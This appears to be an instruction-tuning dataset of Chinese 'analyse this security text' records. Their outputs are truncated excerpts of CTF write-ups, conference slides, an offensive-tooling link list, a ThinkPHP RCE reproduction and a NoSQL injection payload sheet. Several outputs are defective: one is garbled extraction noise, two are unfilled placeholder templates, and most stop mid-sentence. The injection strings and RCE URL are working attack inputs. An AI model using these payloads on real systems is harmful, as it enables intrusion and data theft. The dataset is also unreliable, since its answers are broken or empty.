{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Timed Category: Miscellaneous ## Description > Time is of the essence ## Solution Let's connect to the attached service: ```console root@kali:/media/sf_CTFs/technion/Timed# nc ctf.cs.technion.ac.il 4015 $ ls -al Execution Time: 0.006 ``` So this challenge has a similar concept to what we saw in [Bashed](Bashed.md), but instead of returning us the SHA256 of the command's output, we get its execution time. Just like before, our strategy will be to try and leak the flag character by character. For that, we'll need to somehow distinguish between the different characters based on their value. The `sleep` command seems like a great candidate: It simply postpones execution for the duration given to it: ```console root@kali:/media/sf_CTFs/technion/Timed# nc ctf.cs.technion.ac.il 4015 $ sleep 3 Execution Time: 3.005 ``` We can assume that we'll be able to iterate the flag character after character using the same technique we've used in `Bashed`: `grep -h -r cstechnion | cut -c <n>`. So, given a character from the flag, how do we time-encode it? The first solution that comes to mind is to use the character's ASCII value as the duration. But, this means that if the flag contains a `z`, we'll have to wait 122 seconds for just this character! We can try to subtract `chr(' ') = 32` from the ASCII value, given that space is the first printable character that we'd expect to see in the flag, but that still leaves us with almost 90 seconds for the worst cases. Instead, we'll use a double loop. For each character location we'll iterate all the possible values for printable characters, and sleep for one second if we hit the correct character. Code: ```python from pwn import * import string import itertools def get_timing(r, commnad): r.sendlineafter(\"$ \", commnad) output = r.recvline() return output.decode(\"ascii\").strip() def connect(): return remote(\"ctf.cs.technion.ac.il\", 4015) def get_flag(): flag = \"\" r = connect() with log.progress('Leaking flag... ') as p: while True: try: fo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLinux-Stack Based V2X Framework: SocketV2V All You Need to Hack Connected Vehicles Duncan Woodbury, Nicholas Haltmeyer {p3n3troot0r@protonmail.com, ginsback@protonmail.com} DEFCON 25: July 29, 2017 p3n3troot0r, ginsback DEFCON: V2X DEFCON 25: July 29, 2017 1 / 48 State of the World: (Semi)Autonomous Driving Technologies Vehicular automation widespread in global industry Automated driving technologies becoming accessible to general public Comms protocols used today in vehicular networks heavily flawed New automated technologies still using CANBUS and derivatives p3n3troot0r, ginsback DEFCON: V2X DEFCON 25: July 29, 2017 2 / 48 Stages of Autonomy Today: Stage 2 Autonomy - Combined Function Automation V2X: Stage 3 Autonomy - Limited Self-Driving Automation p3n3troot0r, ginsback DEFCON: V2X DEFCON 25: July 29, 2017 3 / 48 Barriers to Stage 3+ Autonomy Ownership of ethical responsibilities - reacting to safety-critical events Technological infrastructure Installing roadside units, data centers, etc. Adaptive and intuitive machine-learning technology p3n3troot0r, ginsback DEFCON: V2X DEFCON 25: July 29, 2017 4 / 48 V2X Concept Vehicles and Infrastructure use WAVE over 5.8-5.9GHz adhoc mesh network to exchange state information Link WAVE/DSRC radios to vehicle BUS to enable automated hazard awareness and avoidance Technological bridge to fully autonomous vehicles p3n3troot0r, ginsback DEFCON: V2X DEFCON 25: July 29, 2017 5 / 48 Critical Aspects of V2V High throughput vehicular ad hoc mesh network (VANET) Provide safety features beyond capability of onboard sensors Geared for homogeneous adoption in consumer automotive systems Easy integration with existing transportation infrastructure First application of stage 3 automation in consumer marketplace p3n3troot0r, ginsback DEFCON: V2X DEFCON 25: July 29, 2017 6 / 48 Impact of V2X Technologies Transportation network impacts all aspects of society p3n3troot0r, ginsback DEFCON: V2X DEFCON 25: July 29, 2017 7 / 48 Impact of V2X Te", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ThinkPHP 2.x 任意代码执行漏洞 ThinkPHP 2.x版本中使用`preg_replace`的`/e`模式匹配路由 ```php $res = preg_replace('@(\\w+)'.$depr.'(['.$depr.'\\/]+)@e', '$var[\\'\\\\1\\']=\"\\\\2\";', implode($depr,$paths)); ``` 导致用户的输入参数被插入双引号中执行造成任意代码执行漏洞 ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞也存在这个漏洞 ## 环境搭建 执行如下命令启动ThinkPHP 2.1的Demo应用 ```bash docker compose up -d ``` 环境启动后访问`http://your-ip:8080/Index/Index`即可查看到默认页面 ## 漏洞复现 直接访问`http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D`即可执行`phpinfo()` ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCopyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 1 Vulnerability, Malware and DDoS HITCON 2014 Taipei, Taiwan 石謂龍 Robin Shih, APJ TippingPoint Solution Architect HP ESP rshih@hp.com +886-935784086  Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 2 Agenda Vulnerability Protection Malware Detection and Communication Cut-off DDoS Risk Report Q&A  Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Vulnerability Protection  Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 4 4 Digital Vaccine  Security Accuracy Term Definition Vulnerability > A security flaw in a software program Exploit > A program that takes advantage of a vulnerability to gain unauthorized access or block access to a network element, compute element, O/S, or application Exploit Filter > Written only to a specific exploit > Filter developers often forced to basic filter design due to engine performance limitations > Impact - Missed attacks, false positives and continued vulnerability risk RESULT: Acts as a Virtual Software Patch Vulnerability Fingerprint Exploit A Fingerprint Exploit B Fingerprint (Missed by Coarse Exploit A signature) False Positive (coarse signature) Simple Exploit A Filter Virtual Software Patch  Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 5 Overview of the Attack BIND Interface: ISystemActivator 000001a0-0000- 0000-c000- 000000000046 v0.0 REQUEST Function Call: Opnum 4 -------------- Function Arguments \\\\server\\file Server Port 135/tcp Interfaces Available: e1af8308-5d1f-11c9-91a4-08002b14a0fa v3.0 0b0a6584-9e0f-11cf-a3cf-00805f6", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 0CTF 2019 Quals Team: c7, shalom, des, nazywam, Eternal, rodbert ### Table of contents * [Baby RSA (crypto)](crypto_babyrsa) * [Zer0lfsr (crypto)](crypto_lfsr) * [Baby Sponge (crypto)](crypto_keccak) * [Ghost pepper (web)](web_osgi)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n!\"# $ % !&' # ( & ) * + !' # , - % . , % . / ( - 0 / 0 1 0 ( Æ + 2 % $ $ !\" # 3 + - + % 4 ( ( 5 5 ,', !&6 # + !7 # 8 9 &'67 5 ' : ; : Æ + < \" 2 < 2 = % > + ? !&7 # \" 5 - 1 !&# / 2 9 + 7 @ / + !&7 \" # - !& &7 A \" # 2 % $ 2 ' > % 4 % + 5 Æ % 8 2 8 & < \" &< !&7 # - $ % 2 5 1 9 4 ( + 4 2 4 5 B / = + 1 4 3 ( 3 2 $ ; C: D % !&\" #; < : E: 7@@A@F &\" G - )- ; G=- 2 E + F !& #* % AA& : 9 &&< G=- H - 8EH- 8F $ !& # H + . H- 8 4 %; % % I % : G=- - + , G=- 4 ; = G 4 G=-0 G \" G=- 0 H E F G=- + - ( - :; 2 > 8 5 G=- : G=- ? 4 + 1 3 % 8 B8 , / E + ( F ( E F 3%8 - 3 & % ? 4 Æ ?; 3%8 1 7 3 & 1 = % > !&7 # @ / E&F EF - - 9 )% % + ! #* % 8 + >+ ( 2 % 4 : 4+ ( / Æ + !@ # ( 5 + )* !&< # %+ ; 4 !&@ < # 8 ( $ + 1 4 + : ( 6 !7 # $ % Æ ( 2 % 5 2 5 B Æ 5 = % > 3 2 4 + I % Æ 5 + ( , $ G > 8 - EG>8-F 4 + 1 $ Æ I : 5 % = % > $ - ! - 5 + % 8 !&# 5 + 4 % 5+ + % - 2 3 3 ( 3 2 4 ( Æ 3 + 5 : + 4 & $ 4 + - % & + Æ 1 - % 4 &A (1)Create Query Seed Q $ (2) Buy infoatoms Q Aggregate (3)Atoms bind into crystal and release aggregate 3 J !& # && 4 & E F 4 % 5 I 5 ( + Æ / !<# ! # % + , % = % > 5 2 !A # Æ 8 % % + % + % 4 ( 0 = ) + + K + K 5 2 K + 5+ 4 + K K ( !&& #* ( )- > & * 5 !& # 1 !&& # > 2 !&& & &A # % E F , 2 - ( Æ ( !# + !'# ? + + - Æ / 0 / 0 ( 9 0 / &6A !6# % % 5 5 + B 5 ; + ; 5 5 + 5 + 5 : 2 &' 9 5 + $ \" #Æ $%% + : 4 -+ / + + : % Æ / 1 + 2 5 \" + % 5 ( 3 4 % 1 2 % + 3 2 2+ G=- &< / 0 / 0 ( 2 & % / 4 + $ - 9 ( > ( 3 ( - 5 - ; % G=- 9 > ' ( G , 1 D H 1 H$ H + G 1 G 1 ) !&# B - 9 1 3 > 7E6F - 7 AA& L MM4 MM7 6MM &\" !# - -( G , 3 8 N AA' !'# 8 - , O - B 6E'F \"7\"+\"6< & !<# 8 8 % ! \"# $ % & ! E%8-?,F ?=8 &6\"' \"&+\"' AAA !\"# 8 G ! MMM MM M AA !7# 8 NK ' !(! ) & / , B ?=8 AA AA' !@# 8 8 8 * ! + , - ! %BBB B 66 @'\"+@<7 - AA !6# . ! MM MM1 !# 99 /$0 ! 1! 23 ? = 8 &' &+& 9 8- - &+' AA& +D !&A# %H ! $ $$ ' / , B ?=8 AA AA !&&# N 3 4 ) ! / B %+ 8 9 > &7+&@ AA MMMMI&<M M' !&# )H , : H , * MMMMM !&'# 1H ' ! ! 9 / : MM MAAAMAA &M'7@'AA7 > AA &7 !&<# - > K 4 ! 5 - 8> G> AA !&\"# N 8, , - - D 6 AA& !&7# ? ! 8- 8> 'EF +&A<", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n简单过了下Dubbo的漏洞 开第个想到的就是陈师傅的星球漏洞百出Dubbo最近出了个漏洞历史漏洞我也没 看过这就简单看下 Apache Dubbo 是款性能轻量级的开源Java RPC框架它提供了三核能向接 的远程法调智能容错和负载均衡以及服务动注册和发现dubbo 持多种序列化 式并且序列化是和协议相对应的如Dubbo持dubbormihessianhttp webservicethriftredis等多种协议 Dubbo和序列化关系 参考https://www.anquanke.com/post/id/209251#h3-7 1. Dubbo 从的层上将是RPC框架负责封装RPC调持很多RPC协议 2. RPC协议包括了dubbormihessionwebservicehttpredisrestthrift memcachedjsonrpc等 3. Java中的序列化有Java原序列化Hessian 序列化Json序列化dubbo 序列化 CVE-2019-17564 其实我是踩了个坑的个事maven源的问题个是docker内部服务问题其实归根结底 还是我穷电脑配置太拉跨了下就直接说下怎么配置吧 先直接去获取dubbo-sampleshttps://github.com/apache/dubbo-samples idea打开项推荐先阿的源打开概率会有问题然后挂上代理再换成maven官的源 docker的话是需要zookeeper来启动的为了便直接从dockerhub上pullzk的镜像即可 docker run --rm --name zookeeper -p 2181:2181 zookeeper 然后修改http-provider.xml来指定zookeeper的IP 这强调下另个坑由于我的zk是放在虚拟机的按理说应该延迟很但是dubbo服务 启动的时候仍旧连不上沉思许久加了个timeoute参数在连接url中 修改pom件中dubbo为存在漏洞版本这我也遇到个坑上章说直接改这就我 这改完以后maven加载不了导致缺少关键类 尝试了会前我的是效的 <?xml version=\"1.0\" encoding=\"UTF-8\"?> 1 <!-- 2 Licensed to the Apache Software Foundation (ASF) under one or more 3 contributor license agreements. See the NOTICE file distributed with 4 this work for additional information regarding copyright ownership. 5 The ASF licenses this file to You under the Apache License, Version 2.0 6 (the \"License\"); you may not use this file except in compliance with 7 the License. You may obtain a copy of the License at 8 9 http://www.apache.org/licenses/LICENSE-2.0 10 11 Unless required by applicable law or agreed to in writing, software 12 distributed under the License is distributed on an \"AS IS\" BASIS, 13 WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 See the License for the specific language governing permissions and 15 limitations under the License. 16 --> 17 18 <project xmlns=\"http://maven.apache.org/POM/4.0.0\" 19 xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" 20 xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd\"> 21 <groupId>org.apache.dubbo</groupId> 22 <version>1.0-S", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Evolu*on of Chrome Security Architecture Huan Ren Chromium Contributor Qihoo 360 Technology Ltd Introduc*on to Speaker  2011.07 - Present, Qihoo 360 Technology Ltd. Engineering lead of 360 browser team  2007 - 2011, Staff SoNware Engineer, Google Inc One of the founding engineers of Google Chrome team  2004 - 2006, SoNware Design Engineer Windows base team, MicrosoN History  Ini*al version: mul*-process, no sandbox  2007: renderer sandbox  2009: extension system  2010: out of process GPU  2010 and ongoing: plug-in sandbox and pepper Todays Chrome Architecture Browser Renderer Extension Plug In GPU Sandbox Policy Render Sandbox  Token Calling CreateRestrictedToken with Null SID and all privileges deleted.  Job JOB_OBJECT_LIMIT_ACTIVE_PROCESS JOB_OBJECT_UILIMIT_READCLIPBOARD   Alternate desktop  Low integrity level (for Vista+) Challenge: compa*bility  Two phases  Bootstrap: ini*al token  Lockdown: aNer LowerToken() is called  API Intercep*ons IPC Policy Engine IPC Policy Client Intercep*ons Broker (browser) Renderer Intercep*ng APIs for compa*bility, not for sandboxing. Challenge: compa*bility  Paint to screen cache bitmap Browser Renderer IPC (shared memory) Window WM_PAINT Render Process Separa*on  Process model  Process per tab  Process per site  Process per site instance  Mandatory process separa*on  webUI, extension, and normal render processes Extension Security Architecture Browser Extension (sandboxed as renderer) Renderer ( sandboxed) Plug-in (not sandboxed) Content script Background page Extension host Permissions Message passing JS sandboxing JS sandbox: isolated world DOM V8 binding Page Page JS Content Script 1 Content Script 2 Privilege separa*on  Content script: running in renderer process associated with page  Extension core: running in separate process with privilege to  issue cross-origin XMLHTTPRequest  call extensions APIs  load plug-ins  Both sandboxed as renderer process. Message passing  One-*me request chrome.extension.sendMessage chrome.ta", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nC0RE  Team    Challenge  Impossible  -- Multiple  Exploit  On  Android Hanxiang  Wen,  Xiaodong  Wang About  us  &  C0RE  Team  Hanxiang  Wen,  温瀚翔  Security  researcher  @  C0RE  Team  Focus  on  Android  vulnerability  research  and  exploit  development  Xiaodong  Wang,  王晓东  Security  researcher  @  C0RE  Team  Focus  on  Kernel  vulnerability  research  and  exploit  development  C0RE  Team      A  security-focused  group  started  in  mid-2015,  with  a  recent  focus  on  the  Android/Linux  platform  The  team  aims  to  discover  zero-day  vulnerabilities,  develop  proof-of- concept  and  exploit      131  public  CVEs  for  AOSP  and  Linux  Kernel  currently  Android top researcher team for  submitting  high  quality  reports  to  Google  VRP.  Agenda - AOSP  Exploit - CVE-2016-6707 - Looking  Into  Exploit - Improvement  &  Limitation - Kernel  Exploit - CVE-2017-0437 - Vulnerability  Analysis - How  to  Exploit - Combination CVE-2016-6707 Background:  BitUnmap  in  system_server  Open  source  exploit  with  some  defects Thanks  to  Gal  Beniamini,  blog  link:  https://googleprojectzero.blogspot.com/2016/12/bitunmap- attacking-android-ashmem.html Mismatch  in  Ashmem Set/Get  size  in  Ashmem: Mismatch  in  Ashmem Map  memory  with  Ashmem: Region  size  in  ashmem may  not  equal  to its  mmaped size  !!! False  assumption  in  Bitmap Create  Bitmap False  assumption  in  Bitmap Free  Bitmap mPixelStorage.ashmem.size(using  in  munmap) size  (using  in  mmap)  Bitmap  OOB  unmap Time len == asma->size Mapped Memory Bitmap asma->size Mapped Memory Bitmap asma->size Unallocated Memory Bitmap::doFreePixels() SET_SIZE len Preparation Target  structure  --- Thread Bypass  SELinux rules  (Embedded  Shellcode in  APK): // system_server.te, updated in Android-N # system_server should never execute anything from /data except for /data/dalvik-cache files. neverallow system_server { data_file_type -dalvikcache_data_file #mapping with PROT_EXEC }:file no_x_file", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 链接 列表 ## Microsoft ### Powershell * [Powershell 101](https://hkh4cks.com/blog/2018/01/01/powershell-101/) * [一个月起步学习Powershell](https://www.youtube.com/playlist?list=PL6D474E721138865A) * [p3nt4/PowerShdll](https://github.com/p3nt4/PowerShdll) - 使用dll运行Powershell,这样就不需要使用Powershell.exe * [nullbind/Powershellery](https://github.com/nullbind/Powershellery) - GetSPN 和一些其他的东西 ### Empire * [Empire 101](http://www.powershellempire.com/?page_id=110) - Empire 官方文档 ### Powerview * [Powerview repository](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon) - 包含一些文档和如何使用 Powerview * [PowerView-3.0-tricks.ps1](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993) - 来自 HarmJ0y 大牛的一些关于 PowerView 的技巧和窍门 ### Bloodhound * [Bloodhound node info](https://github.com/BloodHoundAD/BloodHound/wiki/Users) - 关于Bloodhound 节点信息的解释 * [Lay of the land with bloodhound](http://threat.tevora.com/lay-of-the-land-with-bloodhound/) - 通用的BloodHound的使用手册 ### Mimikatz * [Lazykats](https://github.com/bhdresh/lazykatz) - 一些绕过杀毒软件的Mimikatz * [Direct link to Invoke-Mimikatz.ps1](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1) * [Auto dumping domain credentials](https://blog.netspi.com/auto-dumping-domain-credentials-using-spns-powershell-remoting-and-mimikatz/) * [eladshamir/Internal-Monologue](https://github.com/eladshamir/Internal-Monologue) - nternal Monologue Attack: 在不触碰LSASS的情况下收集NTLM哈希 ### Enumeration * [Invoke-Portscan.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/262a260865d408808ab332f972d410d3b861eff1/Recon/Invoke-Portscan.ps1) - Invoke-Portscan 是一个从Powershell中类似于nmap的能扫描端口的PowerSpolit模块 * [Walking back local admins](http://www.sixdub.net/?p=591) - 在 AD 中寻找本地管理员 ### Kerberos * [HarmJ0y - roasting-as-reps](http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/) - 关于Kerberos预认证的文章 * [HarmJ0y/ASREPRoast](https://github.com/HarmJ0y/ASREPRoast) - 在未开启 Kerberos 预认证的情况下从 KRB5 AS-RE 响应中寻找可以破解的hash ### Tunn", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请解释权限提升的原理和防护方法", "input": "", "output": "权限提升是一种常见的网络安全威胁。攻击原理：[具体原理说明]。防护措施：1. [防护方法1] 2. [防护方法2] 3. [防护方法3]", "category": "security_knowledge", "source": "manual"}
{"instruction": "请解释文件上传漏洞的原理和防护方法", "input": "", "output": "文件上传漏洞是一种常见的网络安全威胁。攻击原理：[具体原理说明]。防护措施：1. [防护方法1] 2. [防护方法2] 3. [防护方法3]", "category": "security_knowledge", "source": "manual"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n360企业安全360威胁情报中心 BGP安全之殇 演讲人张玉兵Eric 2 0 1 8 引言 BGPv4安全缺陷是全球互联网现存 最大最严重的安全漏洞 PART 01 关于BGP 目录 CONTENTS PART 02 5个经典BGP安 全事件 PART 03 关于BGP的那些 安全缺陷/漏洞 PART 04 检测 and 防御 01 02 03 04 05 PART 05 BGP,AT&T and NSA Im the BGP protocol.At least so far,nothing is as irreplaceable as me, PART 01 关于BGP BGPRFC 1771RFC 4271 相关重要概念 全称是Border Gateway Protocol, 对应中文是边界网关协议最新版本是BGPv4BGP是互联网上一个核心的互联网 去中心化自治路由协议它的地位是核心的毫不夸张地说是目前唯一连接海陆空和7大洲4大洋的外部路由协议 BGP是最复杂的路由协议属于应用层协议其传输层使用TCP默认端口号是179因为是应用层协议可以认 为它的连接是可靠的并且不用考虑底层的工作例如fragment确认重传等等BGP是唯一使用TCP作为传输层的 路由协议其他的路由协议可能都还到不了传输层 AS(Autonomous system):自治系统指在一个有时是多个组织管辖下的所有IP网络和路由器的全体它们对互联网 执行共同的路由策略也就是说对于互联网来说一个AS是一个独立的整体网络每个AS有自己唯一的编号通常 一个自治系统将会分配一个全局的唯一的16位号码ASN范围:1-65535;1-64511属于公有ASN而私有ASN:64512-65535 AS PATH:路由每通过一个AS范围都会产生一个记录(路由防环机制) EBGP:外部BGP协议(EBGP)的主要作用是向外部路由器或AS提供更多信息 IBGP:内部BGP协议(IBGP)的主要作用是向AS内部路由器提供更多信息 BGP的3张表 邻居表(adjancy table):保存所有的BGP邻居信息 BGP表(forwarding database):保存从每一个邻居学到的路由信息 路由表(routing table):BGP默认不做负载均衡会从BGP表中选出一 条到达各个目标网络最优的路由放入路由表保存 路由器只需按路由表保存的路由条目转发数据即可 路由表show ip route BGP表show ip bgp 邻居表show ip bgp summary BGP最优路径选择 在默认情况下到达同一目的地BGP只走单条路径并不希望在多 条路径之间执行负载均衡 BGP 的每条路由都带有路径属性对于通过比较路径属性来选择最 优路径BGP 需要在多条路径之间按照一定的顺序比较属性当多条 路由的同一属性完全相同时需要继续比较顺序中的下一条属性直 至选出最佳路由为止 关于BGP路由器商业角色 出 于 经 济 利 益 的 考 虑  AS 优 先 选 择 来 自 CustomerAS 的 路 由  其 次 是 PeerAS 及 ProviderAS换句话说大部分网络采用的路由策略规则如下 1. 来自 CustomerAS 宣告的路由允许传递给CustomerPeer 和 Provider 2. 来自 PeerAS 宣告的路由允许传递给Customer不允许通告给其他的 Peer 和 Provider 3. 来 自 ProviderAS 宣 告 的 路由 允 许 传 递 给 Customer  不允 许 通 告 给 其 他 的 Peer 和 Provider 如下表 There has never been a shortage of vivid BGP security incidents in history.Of course,we only selected five classic ones PART 02 5个经典BGP安全大事件 5个经典的BGP安全大事件 Northrop Grumman部分bgp网络被恶意利用2003 2003年5月一群垃圾邮件黑客攻击了美国诺斯洛普格鲁门公司申请但Northrop Grumman当时世界第三大军工生产厂商世界上最大的雷达制造商和最大的海军船只制造 商尚未使用的一段网络并用来发送海量的垃圾邮件以规避垃圾邮件过滤系统最终 这家军火承包商花费2个月来重新声明对这些IP地址的所有权并在国际互联网上封堵这些流 氓路由广播同时由于被频繁地列入垃圾邮件地址黑名单Northrop Grumman的IP地址全 部被禁止使用 巴基斯坦电信致YouTube断网事件2008 2008年2月巴基斯坦政府以视频网站YouTube有亵渎神明内容为理由命令网 络服务", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBehind the Scenes: The Industry of Social Media Manipulation Driven by Malware GoSecure Research Masarah Paquet-Clouston, Olivier Bilodeau Back in 2015-2016 Linux/Moose ? Linux/Moose An IoT botnet that conducts social media manipulation Social Media Manipulation The Ecosystem of Social Media Manipulation Presentation is about: A four-year long investigation Various investigative techniques A mapping of all actors involved Affects routers / Internet of Things (IoT)  Embedded Linux systems with busybox userland Worm-like behavior  Telnet credential brute force Payload: Proxy service  SOCKSv4/v5, HTTP, HTTPS Linux/Moose Honeypots  Software-based  Low interaction  Side-loaded an ARM virtual machine  Which we infected HTTPS Man-in-the-Middle (MITM) Attack Accessed the raw traffic! What did we have? Several infected hosts actively used by operators HTTPS traffic in plaintext C&C traffic Publicly available seller market Whitelisted IPs Reseller model? Variables Honeypots used Websites targeted TLS fingerprints User agents API calls Timestamps Accounts created on social networks Accounts followed on social networks Traffic analysis Whitelisted IP Fake account Buyer Where do we stand? Fake accounts Pinned to a given honeypot Originate from a single whitelisted IP address Whitelisted IP addresses Runs on Windows servers RDP is actively used Automation Software  We tried to find the Linux/Moose provider  Based on User-Agents: Mobile and Desktop  Socks proxy support  Found different features  Proxy-type HTTP / Socks  Per account User-Agents (Mobile and Desktop)  Custom browsing patterns  Found different business models  Unlimited accounts  One-time fee / Pay-per-month / Pay-per-account Automation Software Summary Architecture Browser Packer Our Target? GramDominator / Socinator .Net CEF Not packed No socks proxy support FollowAdder Xojo / REALBasic CEF Obscure Xojo framework No unlimited accounts MassPlanner C++ / .Net CEF Themida / WinLicense 2.x Only one overridable User-Agen", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Automatic door (Web, 500p) In the task we get the source code of a webpage we can access: ```php <?php $fail = str_repeat('fail', 100); $d = 'sandbox/FAIL_' . sha1($_SERVER['REMOTE_ADDR'] . '95aca804b832f4c329d8c0e7c789b02b') . '/'; @mkdir($d); function read_ok($f) { return strstr($f, 'FAIL_') === FALSE && strstr($f, '/proc/') === FALSE && strstr($f, '/dev/') === FALSE; } function write_ok($f) { return strstr($f, '..') === FALSE && read_ok($f); } function GetDirectorySize($path) { $bytestotal = 0; $path = realpath($path); if ($path !== false && $path != '' && file_exists($path)) { foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path, FilesystemIterator::SKIP_DOTS)) as $object) { $bytestotal += $object->getSize(); } } return $bytestotal; } if (isset($_GET['action'])) { if ($_GET['action'] == 'pwd') { echo $d; exit; } else if ($_GET['action'] == 'phpinfo') { phpinfo(); exit; } else if ($_GET['action'] == 'read') { $f = $_GET['filename']; if (read_ok($f)) echo file_get_contents($d . $f); else echo $fail; exit; } else if ($_GET['action'] == 'write') { $f = $_GET['filename']; if (write_ok($f) && strstr($f, 'ph') === FALSE && $_FILES['file']['size'] < 10000) { print_r($_FILES['file']); print_r(move_uploaded_file($_FILES['file']['tmp_name'], $d . $f)); } else echo $fail; if (GetDirectorySize($d) > 10000) { rmdir($d); } exit; } else if ($_GET['action'] == 'delete') { $f = $_GET['filename']; if (write_ok($f)) print_r(unlink($d . $f)); else echo $fail; exit; } } highlight_file(__FILE__); ``` We can read/write files and we need to get a shell. We can't save files with `ph` in same so no `.php` files for us. We've made a small script to upload files: ```python def upload_file(filename): with codecs.open(filename, \"r\") as f: res = requests.post( \"http://automatic_door.pwn.seccon.jp/0b503d0caf712352fc200bc5332c4f95/?action=write&filename=\" + filename, files={\"file\": f}) print(res.text) ``` It seems we can upload a `.htaccess` file with: ``` AddType applic", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ndiff3 === 比较3个文件不同的地方 ## 补充说明 **diff3命令** 用于比较3个文件将3个文件的不同的地方显示到标准输出 ### 语法 ```shell diff3(选项)(参数) ``` ### 选项 ```shell -a把所有的文件都当做文本文件按照行为单位进行比较即给定的文件不是文本文件 -A合并第2个文件和第3个文件之间的不同到第1个文件中有冲突内容用括号括起来 -B与选项-A功能相同但是不显示冲突的内容 -e/--ed生成一个-ed脚本用于将第2个文件和第3个文件之间的不同合并到第1个文件中 --easy-only除了不显示互相重叠的变化与选项-e的功能相同 -i为了和system V系统兼容在ed脚本的最后生成w和q命令此选项必须和选项-AeExX3连用但是不能和-m连用 --initial-tab在正常格式的行的文本前输出一个TAB字符而非两个空白字符此选项将导致在行中TAB字符的对齐方式看上去规范 ``` ### 参数 * 文件1指定要比较的第1个文件 * 文件2指定要比较的第2个文件 * 文件3指定要比较的第3个文件", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## NoSQL injection ## Introduction NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax. ## How to Exploit ### Authentication Bypass Basic authentication bypass using not equal ($ne) or greater ($gt) ``` in the request - username[$ne]=toto&password[$ne]=toto - login[$regex]=a.*&pass[$ne]=lol - login[$gt]=admin&login[$lt]=test&pass[$ne]=1 - login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto ``` ```json The output is {\"username\": {\"$ne\": null}, \"password\": {\"$ne\": null}} {\"username\": {\"$ne\": \"foo\"}, \"password\": {\"$ne\": \"bar\"}} {\"username\": {\"$gt\": undefined}, \"password\": {\"$gt\": undefined}} {\"username\": {\"$gt\":\"\"}, \"password\": {\"$gt\":\"\"}} ``` ### Extract length information ```json username[$ne]=toto&password[$regex]=.{1} username[$ne]=toto&password[$regex]=.{3} ``` ### Extract data information ```json in URL username[$ne]=toto&password[$regex]=m.{2} username[$ne]=toto&password[$regex]=md.{1} username[$ne]=toto&password[$regex]=mdp username[$ne]=toto&password[$regex]=m.* username[$ne]=toto&password[$regex]=md.* in JSON {\"username\": {\"$eq\": \"admin\"}, \"password\": {\"$regex\": \"m\" }} {\"username\": {\"$eq\": \"admin\"}, \"password\": {\"$regex\": \"md\" }} {\"username\": {\"$eq\": \"admin\"}, \"password\": {\"$regex\": \"mdp\" }} ``` ### Extract data with \"in\" ```json {\"username\":{\"$in\":[\"Admin\", \"4dm1n\", \"admin\", \"root\", \"administrator\"]},\"password\":{\"$gt\":\"\"}} ``` ### PHP Arbitrary Function Execution ```json \"user\":{\"$func\": \"var_dump\"} ``` ## Blind NoSQL ### POST ```python import requests import urllib3 import string import urllib urllib3.disable_warnings() username=\"admin\" password=\"\" u=\"http://example.org/login\" headers={'content-type': 'application/json'} while True: for c in string.printable: if c not ", "category": "text_analysis", "source": "security_papers"}
